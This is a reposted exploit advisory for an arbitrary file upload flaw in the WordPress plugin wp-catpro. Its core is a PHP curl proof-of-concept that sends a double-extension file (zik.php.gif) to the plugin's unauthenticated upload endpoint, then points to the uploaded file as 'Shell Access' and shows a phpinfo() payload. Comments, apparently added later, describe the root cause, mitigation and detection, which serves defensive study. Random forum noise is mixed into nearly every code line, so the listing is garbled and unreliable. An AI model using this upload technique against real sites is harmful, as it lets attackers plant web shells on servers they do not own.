WordPress plugin wp-catpro - Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
作者 => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
#=> Exploit
-----------
! `' C1 H6 e$ ?5 G' S. x" E j<?php7 y: u6 u0 i6 v6 Z3 @( v r
// Proof-of-concept request as posted in the advisory. The forum's anti-copy noise
// embedded in each line is left untouched, so this listing is not runnable as-is.
//
// Root cause, as far as the plugin settings quoted above show: upload.php accepts a
// file whose trailing extension is in ("jpg", "gif", "png"), so a name such as
// zik.php.gif passes the check and is written under wp-content/uploads/catpro/.
// Whether the web server then executes a ".php.gif" file depends on its handler
// configuration (multi-extension handling), not on the plugin — confirm per deployment.
//
// Mitigation: remove or update the plugin; validate the whole filename (reject names
// with more than one extension, and store uploads under a server-chosen name and
// extension); deny script execution inside wp-content/uploads at the web-server level.
// Detection: POST requests to .../wp-catpro/js/swfupload/js/upload.php, and
// double-extension files (*.php.gif and similar) appearing under wp-content/uploads/catpro/.
// Local test file; presumably its contents are the phpinfo() probe shown at the end of the post.
9 K+ S7 e: r N" r+ q3 l% S7 n$uploadfile="zik.php.gif";
// Upload endpoint inside the bundled swfupload helper. No cookie, nonce or credentials
// are sent with the request, which suggests the handler is reachable without
// authentication — NOTE(review): verify against the plugin source.
( O: x* V5 v# k1 ]. n$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
4 M! P- P1 Y% M3 o1 V5 `curl_setopt($ch, CURLOPT_POST, true);2 r p/ X" ~% C
// Multipart body: 'Filedata' carries the file ("@path" is the legacy curl upload
// syntax, removed in PHP 7, which dates this PoC); 'folder' is a destination directory
// supplied by the client — if the handler uses it unvalidated that is a second defect
// to check for (not demonstrated here).
curl_setopt($ch, CURLOPT_POSTFIELDS,
9 w0 B6 k. U& xarray('Filedata'=>"@$uploadfile",
5 C' b; q4 k3 | g6 T'folder'=>'/wp-content/uploads/catpro/'));
( ] M5 Q. R3 R+ ?4 Gcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// The handler's response is printed verbatim; presumably it reports the random name
// the file was stored under (see the note below).
2 m# w+ d% e% q+ {$postResult = curl_exec($ch);
# G7 n5 @& X# N1 ocurl_close($ch);2 U, P! J9 u9 Z* K. k8 ?- e1 v o- P
( Y( Z7 I [& b8 I" k( i) a" R7 `
print "$postResult";
& q" R( k9 W9 i4 x6 G
// Not PHP — the advisory's note that the stored file keeps the original double
// extension under a random base name, which is why *.php.gif files under
// uploads/catpro/ are the artefact to hunt for during triage.
# e, B9 P ^5 qShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
. {6 I% i7 p% z A/ V. O ?>6 h' Z1 q+ W! c: K
<?php
// Body of the uploaded test file: a phpinfo() probe that only confirms server-side
// execution. Finding this (or any PHP) inside an uploads directory is a strong
// indicator of compromise; phpinfo() output also discloses paths, versions and
// loaded modules, so treat a hit as a reconnaissance step rather than a harmless test.
; c- Y+ K8 w+ K! cphpinfo();
( R" @+ w. W6 h3 y0 Q1 j& Y?> |